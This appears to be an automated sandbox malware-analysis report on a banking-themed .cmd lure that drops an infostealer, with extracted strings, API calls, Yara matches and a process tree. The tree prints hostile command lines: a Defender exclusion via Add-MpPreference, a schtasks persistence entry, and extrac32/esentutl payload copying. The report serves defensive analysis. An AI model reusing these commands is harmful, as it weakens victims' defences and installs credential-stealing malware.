Source: neworigin.exe, 0000000B.00000002.2337075849.0000000002971000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001A.00000002.2422352208.000000000268C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.2257244398.0000000004935000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: x.exe, 00000004.00000002.2176035692.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/
Source: x.exe, 00000004.00000002.2220018454.00000000208FD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysx
Source: x.exe, 00000004.00000002.2220018454.0000000020913000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2176035692.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2176035692.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
Source: x.exe, 00000004.00000002.2176035692.000000000088E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_WisrysxlfssC
Source: x.exe, 00000004.00000002.2176035692.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfssexell
Source: x.exe, 00000004.00000002.2176035692.0000000000903000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
Source: powershell.exe, 0000000D.00000002.2269568363.000000000584A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown	HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49791 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe

Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.0.neworigin.exe.540000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

.NET source code contains very large strings

Source: server_BTC.exe.10.dr, opqcmgIPmeabY.cs	Long String: Length: 17605
Source: TrojanAIbot.exe.12.dr, opqcmgIPmeabY.cs	Long String: Length: 17605

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B28670 NtUnmapViewOfSection,	4_2_02B28670
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B28400 NtReadVirtualMemory,	4_2_02B28400
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B27A2C NtAllocateVirtualMemory,	4_2_02B27A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	4_2_02B2DC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02B2DC04
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B28D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02B28D70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	4_2_02B2DD70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B27D78 NtWriteVirtualMemory,	4_2_02B27D78
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B27A2A NtAllocateVirtualMemory,	4_2_02B27A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B2DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02B2DBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B28D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02B28D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 24_2_02B68670 NtUnmapViewOfSection,	24_2_02B68670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 24_2_02B68400 NtReadVirtualMemory,	24_2_02B68400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 24_2_02B67A2C NtAllocateVirtualMemory,	24_2_02B67A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 24_2_02B68D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	24_2_02B68D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 24_2_02B6DD70 NtOpenFile,NtReadFile,NtClose,	24_2_02B6DD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 24_2_02B67D78 NtWriteVirtualMemory,	24_2_02B67D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 24_2_02B686F7 NtUnmapViewOfSection,	24_2_02B686F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 24_2_02B67A2A NtAllocateVirtualMemory,	24_2_02B67A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 24_2_02B68D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,	24_2_02B68D6E
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029F8670 NtUnmapViewOfSection,	28_2_029F8670
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029F8400 NtReadVirtualMemory,	28_2_029F8400
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029F7A2C NtAllocateVirtualMemory,	28_2_029F7A2C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029F7D78 NtWriteVirtualMemory,	28_2_029F7D78
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029F8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	28_2_029F8D70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029FDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	28_2_029FDD70
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029F86F7 NtUnmapViewOfSection,	28_2_029F86F7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029F7A2A NtAllocateVirtualMemory,	28_2_029F7A2A
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029FDBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	28_2_029FDBB0
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029FDC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	28_2_029FDC8C
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029FDC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	28_2_029FDC04
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029F8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	28_2_029F8D6E

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B28788 CreateProcessAsUserW,

4_2_02B28788

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B120C4	4_2_02B120C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B3E596	4_2_02B3E596
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_00EFEA80	11_2_00EFEA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_00EF4A98	11_2_00EF4A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_00EFAA43	11_2_00EFAA43
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_00EF3E80	11_2_00EF3E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_00EFDF00	11_2_00EFDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_00EF41C8	11_2_00EF41C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_00EFDF00	11_2_00EFDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_065766E8	11_2_065766E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_065756B8	11_2_065756B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_0657C2A0	11_2_0657C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_0657B32A	11_2_0657B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_06573178	11_2_06573178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_06577E78	11_2_06577E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_06577798	11_2_06577798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_0657E4C0	11_2_0657E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_06572350	11_2_06572350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_06570040	11_2_06570040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_06575DDF	11_2_06575DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 11_2_06570025	11_2_06570025
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 12_2_012185B7	12_2_012185B7
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 12_2_012185C8	12_2_012185C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0478B490	13_2_0478B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0478C662	13_2_0478C662
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 18_2_05B21B94	18_2_05B21B94
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 18_2_05B2DAAC	18_2_05B2DAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 18_2_05B225B8	18_2_05B225B8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 18_2_05B225A8	18_2_05B225A8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 18_2_05B2E620	18_2_05B2E620
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 18_2_05B24174	18_2_05B24174
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 18_2_05B21D20	18_2_05B21D20
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 18_2_05B21B88	18_2_05B21B88
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 18_2_05B93360	18_2_05B93360
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 24_2_02B520C4	24_2_02B520C4
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_025241C8	26_2_025241C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_0252AA48	26_2_0252AA48
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_02524A98	26_2_02524A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_0252EA80	26_2_0252EA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_0252DE38	26_2_0252DE38
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_02523E80	26_2_02523E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_0252DE38	26_2_0252DE38
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061C1B48	26_2_061C1B48
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061C1F00	26_2_061C1F00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061D7E78	26_2_061D7E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061D56B8	26_2_061D56B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061D66E8	26_2_061D66E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061DC2A0	26_2_061DC2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061DB338	26_2_061DB338
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061D2360	26_2_061D2360
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061D7798	26_2_061D7798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061DE4C0	26_2_061DE4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061D5DF0	26_2_061D5DF0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061D0040	26_2_061D0040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 26_2_061D0007	26_2_061D0007
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: 28_2_029E20C4	28_2_029E20C4

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\lxsyrsiW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 029F894C appears 50 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 029E46D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02B6894C appears 50 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02B546D4 appears 155 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 02B54860 appears 683 times
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: String function: 029E4860 appears 683 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B146D4 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B289D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B2894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B144DC appears 74 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B14500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: String function: 02B14860 appears 949 times

Source: 11.0.neworigin.exe.540000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: armsvc.exe.10.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: armsvc.exe.10.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winCMD@52/25@5/3

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B17FD2 GetDiskFreeSpaceA,

4_2_02B17FD2

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B26DC8 CoCreateInstance,

4_2_02B26DC8

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-34f23828e93cca9c73779169-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-34f23828e93cca9c-inf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB03128.TMP

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd

ReversingLabs: Detection: 18%

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

Evasive API call chain: __getmainargs,DecisionNodes,exit

graph_10-188

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
